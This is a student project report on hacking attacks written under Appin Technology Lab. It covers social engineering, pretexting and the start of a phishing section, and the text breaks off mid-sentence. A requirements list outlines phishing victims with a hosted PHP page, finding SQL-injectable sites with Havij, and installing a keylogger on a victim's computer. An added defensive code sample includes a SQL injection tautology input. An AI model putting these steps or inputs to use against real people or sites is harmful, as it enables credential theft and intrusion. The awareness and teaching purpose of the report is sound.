Project Report on Hacking Attacks

                                                PREFACE

This project “HACKING ATTACKS” has been developed keeping in mind the heights that
Information Technology has reached: when everything is powered by computers, security does
make a great difference. This project contains information about hacking attacks aimed at
people who use the internet. When a person shares his information on the internet, there is a
greater chance of his personal information leaking. In Information Technology nothing is
completely safe and secure. Computer networks that are currently connected to the internet are
vulnerable to a variety of exploits that can compromise their intended operations. The
tremendous increase in online transactions has been accompanied by an equal rise in the
number and type of attacks against the security of online payment systems. Some of these
attacks have utilized vulnerabilities that have been published in reusable third party
components utilized by websites, such as shopping cart software. So this project helps you to
protect against the hacking attacks which are mainly carried out against websites.

The project HACKING ATTACKS (a delivery status and notification system) is being developed
for the needs of a company running Information Security services; it is specially meant for their
frontline customer service information. This is one of our best efforts to show how the Internet
can be used in a safe and secure way.




This report is written as a text for the partial fulfillment of the B.Tech (C.S.E.) program pursued
from KURUKSHETRA UNIVERSITY, KURUKSHETRA.




                                ACKNOWLEDGEMENT
I would like to express my gratitude to all those who have given me enthusiasm and moral
support and helped in developing my project (HACKING ATTACKS).




I wish to express my gratitude to the projects Team at Head Office who guided and helped me.
Also I would like to express my gratitude to the staff members (Mr. Rajeshwar) of Appin
Technology Lab for not only providing me the opportunity to work with them on this project
(HACKING ATTACKS) but also for their guidance and enthusiasm throughout my development
process.




Finally, my sincere gratitude goes to the e-projects Team at Appin Head Office and my project
guide at the organization, for his valuable guidance and support for the completion of my
HACKING ATTACKS project.




                          CANDIDATES’S DECLARATION




I, Janender, declare that the work which is being presented by me in this project entitled
“HACKING ATTACKS”, in partial fulfillment of the requirement for the BACHELOR OF
TECHNOLOGY (B.Tech) (COMPUTER SCIENCE AND TECHNOLOGY) by “KURUKSHETRA
UNIVERSITY KURUKSHETRA”, is an authentic record of my own work carried out from July to
September 2011 under the supervision of Mr Rajeshwar, Team Leader of APPIN TECHNOLOGY
LAB.




                                                                              Janender Kumar
                                                                  B.Tech (C.S.E.) 7TH Semester
                                                                            K.U.K. (HARYANA)




                                   COMPANY PROFILE




HISTORY - APPIN SECURITY GROUP
Appin Security Group is a global Information Security company focused on training, consulting
and solutions. The company was formed as a merger of two entities, XIRS Ventures Inc based in
Austin Texas incorporated in 2003 and XIRS Appin incubated inside IIT, Delhi India formed in
2004.

Later the name XIRS was dropped from the company and the merged entity is known as Appin
Technologies. From USA & India, the company has now expanded its operations to Europe,
Africa and South East Asia as well.

The company has gone through several mergers and acquisitions and has operated businesses
under the trademarks 'Appin Knowledge Solutions', 'XIRS Appin', 'Appin Technologies', 'Appin
Overseas', 'Appin Software Security' all of whom form a part of the current Appin Security
Group.

INFORMATION SECURITY SERVICE, ETHICAL HACKING TRAINING & CYBER
INVESTIGATION SOLUTIONS
Every day when Appin-ites wake up, we strive to come up with new ways to make our clients
feel more secure. It is our mission to secure what is important to you, and to better it with
time.

We offer Information Security, Ethical Hacking & Allied Technology training to students and
help them build a career by taking our courses ranging from 6 weeks to 3 years. Having trained
and mentored over 83000 students in classroom and distance learning training sessions, we are
confident of doing justice to a student's career. We also provide exclusive business
opportunities to individuals and small businesses to start a franchise in their area focused on IT
& Security training and solutions.

Over 110 entrepreneurs have joined hands with us in 18 nations and 70 cities. It's true that we
are still very short of the 33000 mark achieved by Subway, but we hope to get there soon. We
offer investigative solutions to investigative and intelligence bodies with specialization in cyber
investigation work. 530 organizations including national governments and top-notch lawyers
trust us with their investigation related work.

Last but not least, Appin holds the unique distinction of providing Information security
consulting & network security services to all 4 of India's major airports (Delhi, Mumbai,
Bangalore, Hyderabad) and is also a security solutions provider to over 1300 websites that are
audited and monitored by Appin globally.

We have served Microsoft, Intuit, Actis & Daikin; we promise to help you with your security
needs with equal zeal and enthusiasm if you are a 20-person company that selects us as its
security partner. We will feel extremely privileged to do so.

ETHICAL HACKING, INFORMATION SECURITY & IT TRAINING COURSE
Appin Technology Labs, currently a network of 110+ training labs, provides comprehensive
training in Information Security, Ethical Hacking and related technology areas including
Embedded Robotics, Programming (Microsoft .NET, Java, PHP), Networks and Databases, and
has been operating training centers across India, Africa, Asia, Eastern Europe, South America
and the Middle East. Appin also runs online training programs in North America, Western
Europe and Australia. We are ranked among the top 5 IT professional training companies and
the best in our category by the popular The Week magazine. As a next step, we recommend
you either fill in the inquiry form to have a call back from our counselor and receive directions
to the nearest center, or read more about our courses and select the one that best fits your
need.

WHY INFORMATION SECURITY IS THE RIGHT CAREER CHOICE?
“Frost & Sullivan estimated that there are 2.28 million information security professionals
worldwide. This figure is expected to increase to nearly 4.2 million by 2015. Budgets and
spending are expected to increase in the next 12 months, and salaries showed healthy growth
despite a global recession.” The current worldwide growth rate is billed at 21%. Higher salaries
are being offered to professionals in IT security. The information security industry is currently
worth over $100 B ($60 B in the US, $20 B in the UK, $4.5 B in Japan, over $1.5 B in India).

FRONTRUNNER - 6 MONTH JOB ORIENTED DIPLOMA PROGRAM
The Appin Frontrunner program is designed for individuals whose goal is to build a career in
the field of Ethical Hacking & Information Security. This practical training program starts with
the basics of desktop security and covers SQL injection attacks, encryption, forensics and a
total of 110 topics. Over 63.4% of students who took this course over the last half decade have
been placed within 3 months of completing it.



APPIN IN MEDIA

Appin awarded PC Quest best security implementation award
http://pcquest.ciol.com/content/contentimplementation2008/2008/108050704.asp

Appin’s book on embedded security/robotics becomes bestseller at amazon.com in both US
and UK
http://www.amazon.com/Robotics-Appin-Knowledge-Solutions/dp/1934015024
http://www.amazon.co.uk/Robotics-Appin-Knowledge-Solutions-ebook/dp/B004HO57LW
http://amazonthebestsellersbooks.blogspot.com/2011/03/robotics-appin-knowledge-solutions.html

Appin’s software awarded bestseller on PC World
http://www.pcworld.com/downloads/userreviews/fid,45453/userreviews.html

Appin’s credibility on eBay as an Information Security courseware seller since Jan 2001 (later
Appin launched a franchise model and stopped selling courseware)
http://feedback.ebay.com.au/ws/eBayISAPI.dll?ViewFeedback2&userid=appinlabs&ftab=FeedbackAsSeller

Appin’s collaboration with Microsoft for Software security on Businesswire News site
http://www.businesswireindia.com/PressRelease.asp?b2mid=10155

Appin launch of encryption tool as reported by World Free Press
http://www.free-press-release.com/news-appin-encryption-tool-for-data-security-1252406123.html

Appin launch of operations in Chennai as reported by The Hindu, a leading Indian newspaper
http://www.hindu.com/2006/03/11/stories/2006031117350500.htm

Appin tie-up with Gurukul for launching the first online security and hacking course in India
http://www.golsacademy.com/courses-esecurity.jsp?id=2

Appin partners with ICBT and enters Sri Lanka as reported by Sri Lankan website IT Pro
http://www.itpro.lk/node/169

Appin partners with Telcordia (US billion dollar conglomerate and chief force behind number
portability) to offer security services to the telecom sector
http://www.telcordia.com/news_events/pressreleases/2008/05312008.html

Appin secures Commonwealth Games 2010 held at New Delhi
http://blog.appinonline.com/appin-case-study/appin-completes-another-critical-project-for-information-security-%E2%80%93-our-own-commonwealth-games-delhi-2010.htm

Manipal and Appin join hands to launch India’s first security distance learning program as
reported by The Hindu and Tribune
http://www.hindu.com/edu/2006/10/16/stories/2006101600280100.htm
http://www.tribuneindia.com/2006/20060915/delhi.htm

Appin partners with Intertek, UK, a $1.2B group, to launch IT software certification
http://news.oneindia.in/2008/03/27/appin-intertek-launch-it-certification-1206622960.html

Accolades for Appin in leading franchising websites
http://www.franchiseindia.com/interviews/Established/Hi-tech-knowledge-solutions-gaining-ground-162/
http://www.franchisebusiness.in/c/Appin-Knowlegde-Solutions

Appin in India’s leading dailies Hindustan Times and Times of India
http://www.hindustantimes.com/Safety-net/Article1-617940.aspx
http://www.hindustantimes.com/StoryPage/Print/313041.aspx
http://www.hindustantimes.com/India-caught-in-the-hackers-net/Article1-310109.aspx
http://epaper.timesofindia.com/Repository/getFiles.asp?:LowLevelEntityToPrint_TOINEW&/html&Locale=english-skin-custom&Path=CAP/2010/08/23&ID=Ar04401
http://epaper.timesofindia.com/Repository/getFiles.asp?:LowLevelEntityToPrint_TOINEW&/html&Locale=english-skin-custom&Path=TOIM/2010/08/09&ID=Ar03303
http://articles.timesofindia.indiatimes.com/2004-11-15/education/27149193_1_ipr-iit-d-seminar
http://articles.timesofindia.indiatimes.com/2008-05-26/education/27746033_1_nanotechnology-students-industry-interaction
http://articles.timesofindia.indiatimes.com/2008-05-05/job-trends/27742689_1_information-security-cyber-crimes-security-consultants
http://articles.timesofindia.indiatimes.com/2008-07-20/india-business/27921804_1_mobile-phones-smart-phone-mobile-connections/2




THE INFORMATION SECURITY SPECIALISTS
Appin Security Solutions offers comprehensive solutions to meet real time security needs.
Appin offers a broad array of distributed products and services built on vulnerability-based
research and multi-layered security techniques. Appin has the extensive knowledge, innovative
research methods and complex technologies required to achieve comprehensive security. Our
experienced and certified consultants, architects, project managers and subject matter experts
are prepared to provide your organization with a comprehensive platform of security products
and services designed to protect your entire IT infrastructure, from the network gateway to the
desktop.

The six concepts that need to be covered by security are: confidentiality, integrity,
authentication, authorization, availability, and non-repudiation.

Confidentiality: A security measure which protects against the disclosure of information to
parties other than the intended recipient(s). Often ensured by means of encoding, using a
defined algorithm and some secret information known only to the originator of the information
and the intended recipient(s) (a process known as cryptography) but that is by no means the
only way of ensuring confidentiality.

Integrity: A measure intended to allow the receiver to determine that the information which it
receives has not been altered in transit or by other than the originator of the information.
Integrity schemes often use some of the same underlying technologies as confidentiality
schemes, but they usually involve adding additional information to a communication to form
the basis of an algorithmic check rather than encoding all of the communication.

Authentication: A measure designed to establish the validity of a transmission, message, or
originator. It allows a receiver to have confidence that the information it receives originated
from a specific known source.

Authorization: The process of determining that a requester is allowed to receive a service or
perform an operation.

Availability: Assuring that information and communications services will be ready for use when
expected. Information must be kept available to authorized persons when they need it.

Non-repudiation: A measure intended to prevent the later denial that an action happened, or
that a communication took place, etc. In communication terms, this often involves the
interchange of authentication information combined with some form of provable time stamp.
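An added illustration (not part of the original report) of the distinction drawn above between confidentiality and integrity: the message travels readable, and only a keyed check value is appended so the receiver can run an algorithmic check. The shared key and the payment order are constructed sample values.

```python
import hmac
import hashlib

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes appended to every message


def make_tag(key: bytes, message: bytes) -> bytes:
    """Integrity tag: HMAC-SHA256 over the message, keyed with the shared secret."""
    return hmac.new(key, message, hashlib.sha256).digest()


def protect(key: bytes, message: bytes) -> bytes:
    """Sender side: the message is sent as-is (anyone on the path can read it),
    followed by the tag that lets the receiver perform the check."""
    return message + make_tag(key, message)


def verify(key: bytes, packet: bytes):
    """Receiver side: recompute the tag over the received message and compare.
    Returns the message if the check passes, None if it was altered in transit."""
    if len(packet) < TAG_LEN:
        return None
    message, tag = packet[:-TAG_LEN], packet[-TAG_LEN:]
    # compare_digest runs in constant time, so timing differences do not leak
    # how many leading tag bytes were correct
    if not hmac.compare_digest(tag, make_tag(key, message)):
        return None
    return message


def demo():
    key = b"shared-secret-known-only-to-both-ends"   # constructed sample key
    order = b"PAY 100 TO ACCT-42"                     # constructed sample message
    packet = protect(key, order)
    # no confidentiality: the order text is still visible inside the packet ...
    readable = order in packet
    # ... but changing one digit without the key fails the integrity check
    tampered = packet.replace(b"100", b"900")
    return readable, verify(key, packet), verify(key, tampered)


if __name__ == "__main__":
    print(demo())
```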




Introduction to Project


Project Objective

The main aim of the Hacking Attacks project is to provide awareness of different hacking
attacks. It provides different methods to protect our PCs and data from different hacking attacks.

Introduction

Computer networks that are currently connected to the internet are vulnerable to a variety of
exploits that can compromise their intended operations. Systems can be subject to denial of
service attacks that prevent other computers from connecting to them for the service they
provide (e.g. a web server), or prevent them from connecting to other computers on the
Internet. They can be subject to attacks that cause them to cease operations either temporarily
or permanently. A hacker may be able to compromise a system administrator. The number of
exploits targeted against various platforms, operating systems, and applications increases on a
daily basis. System administrators are usually responsible for monitoring the overall security of
their networks.

The tremendous increase in online transactions has been accompanied by an equal rise in the
number and type of attacks against the security of online payment systems. Some of these
attacks have utilized vulnerabilities that have been published in reusable third party
components utilized by websites, such as shopping cart software. Other attacks have used
vulnerabilities that are common in any web application, such as SQL injection or cross-site
scripting. This article discusses these vulnerabilities with examples, either from the set of
known vulnerabilities or those discovered during the author’s penetration testing assignment.
The different types of vulnerabilities discussed here are SQL injection, cross-site scripting,
information disclosure, path disclosure, price manipulation and buffer overflows. Successful
exploitation of these vulnerabilities can lead to a wide range of results. Information and path
disclosure vulnerabilities will typically act as initial stages leading to further exploitation. SQL
injection or price manipulation can cause the e-commerce business to shut down completely.
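An added example (not code from the original report) of the two web-application weaknesses named above, SQL injection and price manipulation, each shown beside its fix. The in-memory shop database, the user and the tautology input are constructed for the demo; the password is stored in clear only to keep the example short.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed sample shop database: one user account, one catalog item."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    conn.execute("CREATE TABLE products (sku TEXT PRIMARY KEY, price_cents INTEGER)")
    conn.execute("INSERT INTO products VALUES ('CART-001', 4999)")
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """Builds the SQL text by string formatting, so whatever the browser sends
    becomes part of the statement itself. Kept here only for contrast."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone()[0] > 0


def login_parameterized(conn, username: str, password: str) -> bool:
    """Same check with bound parameters: input is handed to the driver as data
    and is never parsed as SQL, so quotes in it cannot change the query."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def checkout_vulnerable(conn, sku: str, qty: int, posted_price_cents: int) -> int:
    """Trusts a price field that came back from the client form: a shopper
    who edits that hidden field pays whatever they like (price manipulation)."""
    return qty * posted_price_cents


def checkout_server_priced(conn, sku: str, qty: int, posted_price_cents: int) -> int:
    """Re-reads the price from the catalog and ignores the posted value; the
    posted value is only compared so that tampering can be logged."""
    row = conn.execute("SELECT price_cents FROM products WHERE sku = ?", (sku,)).fetchone()
    if row is None or qty <= 0:
        raise ValueError("unknown sku or bad quantity")
    if posted_price_cents != row[0]:
        print("price mismatch for %s: client sent %d, catalog says %d"
              % (sku, posted_price_cents, row[0]))
    return qty * row[0]


def demo():
    conn = setup_db()
    inj = "' OR '1'='1"   # classic tautology input, constructed for the demo
    return (login_vulnerable(conn, "nobody", inj),      # True: WHERE clause is always true
            login_parameterized(conn, "nobody", inj),   # False: treated as a literal password
            checkout_vulnerable(conn, "CART-001", 2, 1),     # 2 cents for two items
            checkout_server_priced(conn, "CART-001", 2, 1))  # 9998 cents from the catalog


if __name__ == "__main__":
    print(demo())
```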

Types of Attacks

   1. Non Technical Attacks
          I. Social Engineering Attack
         II. Pretexting
   2. Technical Attacks
          I. Phishing Attack
         II. SQL Injection
        III. Keyloggers

                                       HACKING ATTACKS

                Non Technical Attack               Technical Attack

                   1. Social Engineering              1. SQL Injection
                   2. Pretexting                      2. Phishing
                                                      3. Key logger




SQL Injection (figure in the original report)

Phishing (figure in the original report)

Key loggers (figure in the original report)
Functional Requirement

   1.  All hacking attacks are provided with prevention methods.
   2.  These hacking attacks can be performed only under certain conditions.
   3.  All hacking attacks have certain requirements for performing them.
   4.  There may be certain restrictions on performing these hacking attacks; in any case some
       mishap may also occur.
   5.  These hacks can cause some problems to your system.
   6.  In the Phishing Attack we need a PHP script and an account on a free hosting site; for
       performing phishing we have to send a link to the victim.
   7.  In SQL Injection Attacks we have to find an SQL Injection vulnerable site for performing
       these attacks.
   8.  In SQL Injection Attacks some websites might be restricted, so be careful when
       performing these attacks.
   9.  In Key logger Attacks the key logger is created using Ardamax Key Logger; this key
       logger has to be installed on the victim's computer.
   10. All these attacks have prevention methods.




System Requirement

   1. Operating system: Windows XP
   2. Phishing tool: PHP script and web server
   3. SQL Injection Tool: SQL Poizon and Havij or Net Connection.
   4. Key logger: Ardamax Key Logger





Non Technical Attacks

1. Social Engineering Attack

Most of us are suckered at some point in our lives: coaxed, threatened, heart-strung or baited
into doing something against our better judgment. After it happens, we often feel foolish,
although in truth, falling for a con is seldom a question of intelligence. As humans, we are
bound by both nature and nurture to the social contract, which like many contracts might be
twisted to our disadvantage. Such twisting is called “social engineering”.

Social engineering is the name given to a category of security attacks in which someone
manipulates others into revealing information that can be used to steal data, access to systems,
access to cellular phones, money or even your own identity. Such attacks can be very simple or
very complex. Gaining access to information over the phone or through web sites that you visit
has added a new dimension to the role of the social engineer.

In a business context, a thief (“social engineer”) finds a target and uses the target’s compulsion
to be liked, to avoid confrontations, or to prevent embarrassment against them. Usually the
target is a gatekeeper: someone who has or can provide privileged access to physical or
information assets. Although social engineering exploits can be complex and clever, they’re
usually simple and short-lived. You will be asked to break a rule. There will be extenuating
circumstances. You won’t be given much time to think, and the emotional pressure (typically
anger, camaraderie or desperation) escalates quickly. Perhaps there will be tears. The key to
rebuffing this sort of exploit lies less in recognizing it when it happens than in hardening yourself
to it ahead of time. Being aware of your environment is your first defense. Knowing what
information you may share, and when to say no, is another. The most critical defense, however,
is understanding that it is ok to break the social contract in the interest of security, and knowing
how to do it without incurring undue stress or guilt. Company policies and procedures can be
great assets in thwarting social engineering exploits. As concrete references for security
practices, they should reduce the need for uncomfortable judgment calls. In the event that your
security judgment is challenged, policies can also represent a solid “fall-back” defense. Finally,
policies provide contact information for reporting security incidents after they occur; reporting
exploit attempts is not only good practice, it is a way to get healthy validation for your difficult
choice.

Methodology

A five step approach was used to characterize useful information, extraction attacks and
countermeasures.

- Data was obtained from the chosen social network for several users. The data was taken
  from well-known people on the network as well as less famous ones. Furthermore, very
  active users as well as less active users were observed.
- The data gathered in the first step was studied and it was determined which kinds of attack
  could be realistic.
- Three sample attacks which took place in the last year were chosen. The chosen attacks
  were then transferred to the prototypes and the chosen social network.
- The attacks were tested on the sample profiles for their feasibility and efficiency.
- Countermeasures were elaborated to mitigate the risk of attacks.


Example of Social Engineering

Social engineering expert Chris Hadnagy shares juicy tales of successful cons he's seen as a
security consultant, and six prevention tips

By Joan Goodchild, Senior Editor




Chris Hadnagy gets paid to fool people, and he's gotten pretty good at it over the years. A co-
founder of social-engineering.org and author of Social Engineering: The Art of Human Hacking,
Hadnagy has been using manipulation tactics for more than a decade to show clients how
criminals get inside information.

Hadnagy outlines three memorable stories of social engineering tests that he's included in his
new book (you can also read a short excerpt), and points out what organizations can learn from
these results.

The Overconfident CEO

In one case study, Hadnagy outlines how he was hired as an SE auditor to gain access to the
servers of a printing company which had some proprietary processes and vendors that
competitors were after. In a phone meeting with Hadnagy's business partner, the CEO informed
him that "hacking him would be next to impossible" because he "guarded his secrets with his
life."

"He was the guy who was never going to fall for this," said Hadnagy. "He was thinking someone
would probably call and ask for his password and he was ready for an approach like that."



After some information gathering, Hadnagy found the locations of servers, IP addresses, email
addresses, phone numbers, physical addresses, mail servers, employee names and titles, and
much more. But the real prize of knowledge came when Hadnagy managed to learn the CEO
had a family member that had battled cancer, and lived. As a result, he was interested and
involved in cancer fundraising and research. Through Facebook, he was also able to get other
personal details about the CEO, such as his favorite restaurant and sports team.

Armed with the information, he was ready to strike. He called the CEO and posed as a
fundraiser from a cancer charity the CEO had dealt with in the past. He informed him they were
offering a prize drawing in exchange for donations—and the prizes included tickets to a game
played by his favorite sports team, as well as gift certificates to several restaurants, including
his favorite spot.

The CEO bit, and agreed to let Hadnagy send him a PDF with more information on the fund
drive. He even managed to get the CEO to tell him which version of Adobe reader he was
running because, he told the CEO "I want to make sure I'm sending you a PDF you can read."
Soon after he sent the PDF, the CEO opened it, installing a shell that allowed Hadnagy to access
his machine.

When Hadnagy and his partner reported back to the company about their success with
breaching the CEO's computer, the CEO was understandably angry, said Hadnagy.

"He felt it was unfair we used something like that, but this is how the world works," said
Hadnagy. "A malicious hacker would not think twice about using that information against him."

Takeaway 1: No information, regardless of its personal or emotional nature, is off limits for a
social engineer seeking to do harm

Takeaway 2: It is often the person who thinks he is most secure who poses the biggest
vulnerability. One security consultant recently told CSO that executives are the easiest social
engineering targets.



The theme-park scandal

The target in this next case study was a theme park client that was concerned about potential
compromise of its ticketing system. The computers used to check-in patrons also contained
links to servers, client information and financial records. The client was concerned that if a
check-in computer was compromised, a serious data breach might occur.

Hadnagy started his test by calling the park, posing as a software salesperson. He was offering a
new type of PDF-reading software, which he wanted the park to try through a trial offer. He



asked what version they were currently using, got the information easily, and was ready for
step two.

The next phase required on-site social engineering, and Hadnagy used his family in order to
ensure success. Heading up to one of the ticket windows with his wife and child in tow, he
asked one of the employees if they might use their computer to open a file from his email. The
email contained a pdf attachment for a coupon that would give them discount admission.

"The whole thing could have gone south if she said 'No, sorry, can't do that,'" explained
Hadnagy. "But looking like a dad, with a kid anxious to get into the park, pulls at the heart
strings."

The employee agreed, and the park's computer system was quickly compromised by Hadnagy's
bad PDF. Within minutes, Hadnagy's partner was texting him to let him know he was 'in' and
'gathering information for their report.'

Hadnagy also points out that while the park's employee policy states that they should not open
attachments from unknown sources (even a customer needing help), there were no rules in
place to actually enforce it.

"People are willing to go to great lengths to help others out," said Hadnagy.

Takeaway 3: Security policy is only as good as its enforcement

Takeaway 4: Criminals will often play to an employee's good nature and desire to be helpful



The hacker is hacked

Hadnagy gives a third example showing how social engineering was used for defensive
purposes. He profiles 'John,' a penetration tester hired to conduct a standard network pen test
for a client. He ran a scan using Metasploit, which revealed an open VNC (virtual network
computing) server, a server that allows control of other machines on the network.

He was documenting the find with the VNC session open when, suddenly, in the background, a
mouse began to move across the screen. John knew it was a red flag because at the time of day
this was happening, no user would be connected to the network for a legitimate reason. He
suspected an intruder was on the network.

Taking a chance, John opened Notepad and began chatting with the intruder, posing as a 'n00b'
hacker, someone who is new and unskilled.




"He thought 'How can I get more information from this guy and be more valuable to my
client?'" said Hadnagy. "John played to the guy's ego by trying to pretend he was a newbie who
wanted to learn more from a master hacker."

John asked the hacker several questions, pretending to be a younger person who wanted to
learn some tricks of the hacking trade and who wanted to keep in touch with another hacker.
By the time the chat was over, he had the intruder's email, contact information—and even a
picture of him. He reported the information back to his client, and the problem of easy access
to the system was also fixed.

Hadnagy also points out that John learned through his conversation with the hacker that the
hacker had not really been 'targeting' the company who he had hacked, he had just been out
looking around for something easy to compromise and found that open system quite easily.



Common types of social engineering

Social engineering can be broken into:

- Human Based: human based refers to person-to-person interaction to retrieve the desired
  information.
    - Impersonation: Case studies indicate that help desks are the most frequent targets of
      social engineering attacks.
        - A social engineer calls the help desk.
        - The help desk is helpful.
        - The social engineer will often know the names of employees.
    - Important User: A common ploy is to pretend to be not only an employee, but a vice
      president.
        - The help desk is less likely to turn down a request coming from a high level official.
        - The social engineer may threaten to report the employee to their supervisor.
    - Third party authorization: The social engineer may have obtained the name of someone
      in the organization who has the authority to grant access to information.
        - “Ms. Martinez says it’s ok.”
        - “Before she went on vacation, Ms. Martinez said I should call you to get this
          information.”
    - Tech Support: The social engineer pretends to be someone from the infrastructure
      support groups.
        - “The system is having a problem.”
        - “I need you to log on to test the connection.”
    - In Person: The social engineer may enter the building and pretend to be an employee,
      guest or service personnel.
        - May be dressed in uniform
        - Allowed to roam
        - Become part of the cleaning crew
    - Dumpster diving: Going through the trash.
    - Shoulder Surfing: Looking over a shoulder to see what they are typing.
        - Password
        - Phone-card number
- Computer Based: computer based refers to having computer software that attempts to
  retrieve the desired information.
    - Pop Up Windows: A window will appear on the screen telling the user he has lost his
      network connection and needs to re-enter his username and password.
        - A program will then email the intruder with the information.
    - Mail Attachments: Programs can be hidden in mail attachments.
        - Virus
        - Worms
        - I Love You
    - Spam, Chain letters and hoaxes: These all rely on social engineering to be spread.
        - While they do not usually cause damage, they do cause a loss of productivity.
        - They use valuable network resources.
    - Website: A common ploy is to offer something free or a chance to win a sweepstakes on
      a website.
        - To win requires an e-mail address and password.
        - Used with a 401k come-on.

“The best defense against social engineering attacks combines raising the bar of awareness
among students, faculty and staff, coupled with a sense of personal responsibility to protect the
assets.”

2. Pretexting

Pretexting is generally defined as obtaining sensitive or personal information through
impersonation or other deception. Pretexting is considered an illegal act under most
circumstances, but the laws against the practice vary from state to state and aren't always
clearly written. It is illegal, under the Gramm-Leach-Bliley Act, to use pretexting in order to gain
access to bank accounts or other sensitive financial information. It is not necessarily illegal,
however, to use pretexting in order to obtain phone records or expose an unfaithful spouse.
Lying about your identity is not always a crime, but benefiting financially from pretexting is
actionable.

Many people are familiar with the idea of illegal computer hacking and identity theft, but very
few people are familiar with the practice of pretexting. Hacking into computer servers or using
sophisticated programs to uncover passwords is only one aspect of cyberhacking. Practices such
as pretexting and phishing are examples of social engineering, the human element behind
hacking. Pretexting works best when the pretexter gives a convincing performance, complete
with the proper technical jargon or other insider information.

A typical pretexting incident might involve a criminal trying to access a victim's personal bank
account. The criminal calls the victim at home, claiming to be conducting a survey. The
questions may sound relatively harmless, but the fake surveyor is really trying to glean personal
information, such as a mother's maiden name, a birthdate, a family pet's name or even a
portion of the victim's Social Security number. Once the perpetrator has this information, the
pretexting continues at the victim's bank.

The caller uses the victim's name when identifying himself to the bank's representative. A
pretexter might create a story about losing a checkbook or forgetting her new password. The
bank may have strict security measures in place, but the criminal's pretexting can provide many
of the answers they seek. Once the criminal has full access to the victim's banking information,
he can clear out the account in minutes. Another pretexting criminal may use personal
information to create a new credit card account or take over an existing one.

In 2006, the chief executive officer (CEO) of the computer giant Hewlett-Packard became
embroiled in a pretexting scheme and eventually resigned. In an effort to discover the source of
internal information leaks, the former CEO hired an outside investigator. Several Hewlett-
Packard executives discovered that their personal and professional phone records had been
collected without their permission. Following an investigation, it was determined that the
outside investigators had used pretexting in order to obtain those phone records. The phone
company's representatives believed they were communicating with the real Hewlett-Packard
employees.

Because of pretexting incidents such as these, lawmakers are working towards a more inclusive
set of laws that would make all forms of commercial pretexting illegal. Private uses of
pretexting may still occur, but the victims could have some legal recourse if the information is
used for illegal gain.

The targets of social engineers who use pretexting aren't just individuals like you or me. They
can extend to even large corporations.

Pretexting in Action

There are tons of movies out there where a hero or a villain uses disguises to infiltrate their
enemies. They're caught in the end eventually and you go on to watch the rest of the story
progress. In real life, however, not all infiltrators are caught, and they are most definitely never
ad hoc. There's meticulous planning involved and with the help of the Internet, it's only become
easier.


Creating a fake scenario is much simpler now than ever before. The Internet has so many
sources of information that it's hard to determine what's real and what's a scam. Social
engineers know this and use it to their advantage. They can set up fake websites, advertise on
real websites with fake announcements, and use e-mail to fool people into believing their
stories.

Most recently, in Boston, a social engineer used pretexting tactics by creating a fraudulent web
site advertising a bridal expo. The web site invited not only attendees but vendors as well. They
advertised by e-mail, posting on Twitter, advertised through Facebook, all actions a true expo
would perform. They even went so far as to create a fake phone number for people to call and
set up their payments through PayPal. Attendees paid $10 to $15 for tickets, and
vendors paid from $30 to $4000! An estimated 6000 individuals and vendors were reported
to have been tricked. This is only one case out of hundreds, and even almost a year later, the
culprits have yet to be found.

Pretexting and You

Corporations use security consulting companies to measure their security against social
engineering. There are third party firms out there that are paid to use pretexting tactics to
enter a large corporation and steal whatever information they can. The third party firm randomly
picks a time, then calls and e-mails ahead of time and uses pretexting to trick the front desk
employees into believing there is a maintenance team headed their way. They create a fake website and buy
fake uniforms to continue their facade.

Working in the consulting sector, I have heard stories of CEO's leaving their offices open, the
security teams left alone in the building after hours, and confidential paperwork lying in the
open. Servers, full of confidential information, were available for access by thumb drives. At
the end of the day the security team brings back all the information and reports on the status of
the corporation's security against social engineering, and pretexting in general. What the
company does afterwards is up to them; there's no guarantee that they'll fix their mistakes.

There's not a lot that can be done regarding your information hosted on corporate servers that
are susceptible to social engineers. The liability is on the corporation. That doesn't mean that
an individual will not be targeted in a similar fashion.

In the same way that a social engineer can create a false pretense that they're a maintenance
worker for a corporation, they can create a persona to enter into an individual's home or office.
If you live in an apartment, an e-mail can be spoofed notifying you that a worker will visit to
check for some wiring issues. You might stumble on a website, created under false pretense by
a social engineer, advertising low priced computer repair, and they're available where you live.




Protecting Yourself from Pretexting

With this knowledge of what pretexting is and how it's used, it's time to discuss how to protect
yourself. How do you protect yourself from social engineers who create elaborate scenarios,
plan each detail, and are driven to steal? What protective measures must you take to keep your
information and your valuables?

Like any other defense to social engineering, you must be proactive and not reactive.

If you receive an e-mail from someone saying that a maintenance worker will be swinging by,
contact the sender's company, not the sender. Give them a ring and verify that they are sending
someone. If you're home when they arrive, ask to speak to their supervisor, but don't take their
word for it, ask for the company's corporate number and their supervisor's name, so that you
can call from your own personal phone. It may seem rude, but if they are a social engineer, your
best defense is to punch holes into their fantasy world.

The same applies to websites advertising events and expos. Call the event center and ask about
the event; go straight to the source. It should raise red flags in your head when you notice that
only cash and PayPal are accepted.

In any event, your best measure of protection is to hit the source of the pretense. If the social
engineer is using pretexting, their weakest point is the fact that their source doesn't exist, it's all
fabricated.




Technical Attacks

1. Phishing

History and current status of phishing

A phishing technique was described in detail in 1987, in a paper and presentation delivered to
the International HP Users Group. The first recorded mention of the term "phishing" is on the
alt.online-service.america-online Usenet newsgroup on January 2, 1996.

     Phishing is online identity theft in which confidential information is obtained from an
individual. It is distinguished from offline identity theft such as card skimming and “dumpster
diving,” as well as from large-scale data compromises in which information about many
individuals is obtained at once. Phishing includes many different types of attacks, including:

     Deceptive attacks, in which users are tricked by fraudulent messages into
     giving out information.
     Malware attacks, in which malicious software causes data compromises.
     DNS-based attacks, in which the lookup of host names is altered to send
     users to a fraudulent server.

Phishing targets many kinds of confidential information, including user names and passwords,
social security numbers, credit card numbers, bank account numbers, and personal information
such as birthdates and mothers’ maiden names.

What Is Phishing?

        The term phishing is a general term for the creation and use by criminals of e-mails and
websites – designed to look like they come from well-known, legitimate and trusted businesses,
financial institutions and government agencies – in an attempt to gather personal, financial and
sensitive information. These criminals deceive Internet users into disclosing their bank and
financial information or other personal data such as usernames and passwords, or into
